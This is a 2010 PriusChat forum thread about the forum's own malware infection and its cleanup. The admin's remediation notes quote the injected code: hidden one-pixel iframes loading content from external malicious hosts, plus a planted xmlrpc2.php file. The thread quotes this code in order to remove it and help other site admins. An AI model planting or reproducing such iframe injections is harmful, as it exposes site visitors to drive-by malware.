1. Attachments are working again! Check out this thread for more details and to report any other bugs.

Prius Chat Virus Warning

Discussion in 'PriusChat Website Questions' started by Judgeless, Jun 22, 2010.

  1. Bob64

    Bob64 Sapphire of the Blue Sky

    Joined:
    Apr 9, 2007
    1,540
    93
    0
    Location:
    Virginia
    Vehicle:
    2007 Prius
    Model:
    N/A
    Ok, I'm browsing with CACHE disabled and I'm still getting the bbb site trying to load.

    It doesn't load when i disable the following script file:
    http://priuschat.com/forums/clientscript/vbulletin_global.js

    the first few words is:
    CLEARLY obfuscated code when compared with another vbulletin site:
    http://forums.guru3d.com/clientscript/vbulletin_global.js

    Seriously, I think its infected. It may be turning on/off based on some variables.
     
    1 person likes this.
  2. Jolly English Gentleman

    Jolly English Gentleman Junior Member

    Joined:
    Mar 21, 2010
    47
    10
    0
    Location:
    Spalding, Lincolnshire, Uk
    Vehicle:
    2007 Prius
    Model:
    N/A
    My antivirus provider the ever efficient German Avira has some details on this in their techblog at Avira – TechBlog which includes some links to Microsoft where there is a temporary fix. However at shut down yesterday an update to for Microsoft.Net Framework 3.5 SP1 and .Net Framework 2.0 SP2 Update for Windows Server 2003 and Windows ZP x86 (KB982524) to address a number of known issues was installed, and I have not experienced any attept by the bbb file to open up Windows Media player. Are the two connected? I'm no IT Geek, so cannot answer that one.

    Avira Premium Security Suite is happy to run a scan. I am running the latest Media player so it has not been immune.
     
  3. Danny

    Danny Admin/Founder
    Staff Member

    Joined:
    Nov 24, 2003
    7,094
    2,116
    1,174
    Location:
    Charlotte, NC
    Vehicle:
    2013 Prius Plug-in
    Model:
    Plug-in Base
    Bob, you ended up being right! The attacker had somehow edited the file without changing the timestamp so it looked to me like it had never been changed.

    Here's some notes on what our server admin did to fix the issue (for other site admins who need to fix the issue):

    • Initial penetration appears to be ?. The attacker added an xmlrpc2.php file that they used to attack the server.
    • Remove code from the header template within your skins
    • Within the template table in your database there is this code:
    PHP:
    <iframe width=1 height=1 border=0 frameborder=0  src=\"http://bbbinvestigation.org/ks\"></iframe><iframe  width=1 height=1 border=0 frameborder=0  src=\"http://centiyo.com/in.cgi?default\"></iframe><iframe  width=1 height=1 border=0 frameborder=0  src=\"http://centiyo.com/in.cgi?default\"></iframe>
    • vbulletin_global.js is infected and needs to be replaced with the latest version from vBulletin.
    • Flush your vB Optimise cache (if you use it)
    • Disable and enable any product under "Manage Products" just to be sure.
     
    5 people like this.
  4. Bob64

    Bob64 Sapphire of the Blue Sky

    Joined:
    Apr 9, 2007
    1,540
    93
    0
    Location:
    Virginia
    Vehicle:
    2007 Prius
    Model:
    N/A
    If anyone here got infected or actually opened up those infected pdf/media files, then be sure to download the free version of malwarebytes at malwarebytes.org and do a scan.
     
    1 person likes this.
  5. bisco

    bisco cookie crumbler

    Joined:
    May 11, 2005
    110,133
    50,050
    0
    Location:
    boston
    Vehicle:
    2012 Prius Plug-in
    Model:
    Plug-in Base
    i seem to be good now, but everytime i boot up i get a symantek script thing i have to go thru and then i'm told i'm not connected to the internet and i click retry and it's fine. other than that all seems well.
     
  6. Jeremy Harris

    Jeremy Harris New Member

    Joined:
    Apr 10, 2010
    221
    39
    0
    Location:
    Salisbury UK
    Vehicle:
    2010 Prius
    Model:
    N/A
    Many thanks for the fix, it looks OK to me now, even on the PC that's not running noscript and adblock.

    Jeremy
     
  7. Bob64

    Bob64 Sapphire of the Blue Sky

    Joined:
    Apr 9, 2007
    1,540
    93
    0
    Location:
    Virginia
    Vehicle:
    2007 Prius
    Model:
    N/A
    Danny, Out of curiosity, would it be possible to setup some sort of hash/CRC for the files - that way you can compare the hash of the files - instead of the datestamp? In case of future security breaches, of course.
     
  8. Stev0

    Stev0 Honorary Hong Kong Cavalier

    Joined:
    Sep 23, 2006
    7,201
    1,073
    0
    Location:
    Northampton, MA
    Vehicle:
    2022 Prius Prime
    Model:
    Plug-in Base
    More importantly, it seems to be running on my PC that IS running adblock and noscript.
     
  9. Rae Vynn

    Rae Vynn Artist In Residence

    Joined:
    May 21, 2007
    6,038
    707
    0
    Location:
    Tumwater, WA USA
    Vehicle:
    2007 Prius
    Model:
    Two
    Thanks, Danny!
     
  10. tapatalk

    tapatalk New Member

    Joined:
    Jun 26, 2010
    1
    1
    0
    Location:
    Hong Kong
    Vehicle:
    2010 Prius
    Model:
    IV
    Hello all,

    Just a quick update from Tapatalk team. We have resolved the issue and has released the updated plugin. More information can be found here:

    ** it appears we don't have the permission to post URL here ** please visit our forum at tapatalk.com for more information.

    Let us know if you have any issue we are happy to help.

    Cheers
     
    1 person likes this.
  11. DaveinOlyWA

    DaveinOlyWA 3rd Time was Solariffic!!

    Joined:
    Apr 13, 2004
    15,140
    611
    0
    Location:
    South Puget Sound, WA
    Vehicle:
    2013 Nissan LEAF
    Model:
    Persona
    so what is it that you guys do? must be nice to have your car package option.
     
  12. pakitt

    pakitt Senior Member

    Joined:
    Aug 10, 2009
    2,173
    1,312
    0
    Location:
    Colorado
    Vehicle:
    2021 Prius Prime
    Model:
    Limited
    I got a virus notice 5 days ago on IE8 - I never noticed this on my Mac machine, but this does not mean it is not doing its deeds on it as well - Mac users tend not to have Anti-Virus (and it might not be the best choice).